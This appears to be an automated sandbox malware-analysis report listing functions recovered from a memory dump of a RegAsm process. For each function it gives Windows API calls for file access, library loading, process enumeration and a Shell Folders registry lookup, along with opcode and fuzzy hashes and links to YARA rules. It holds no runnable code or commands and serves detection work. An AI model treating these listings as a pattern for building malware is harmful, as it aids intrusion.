                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID: failed to allocate %u bytes of memory
                                                                • API String ID: 2803490479-1168259600
                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0041BDDF
                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmpmemset
                                                                • String ID:
                                                                • API String ID: 1065087418-0
                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                • String ID:
                                                                • API String ID: 1381354015-0
                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID:
                                                                • API String ID: 2221118986-0
                                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                • String ID:
                                                                • API String ID: 2154303073-0
                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3150196962-0
                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$PointerRead
                                                                • String ID:
                                                                • API String ID: 3154509469-0
                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                • String ID:
                                                                • API String ID: 4232544981-0
                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$FileModuleName
                                                                • String ID:
                                                                • API String ID: 3859505661-0
                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: EnumNamesResource
                                                                • String ID:
                                                                • API String ID: 3334572018-0
                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseFind
                                                                • String ID:
                                                                • API String ID: 1863332320-0
                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004095FC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                Memory Dump Source
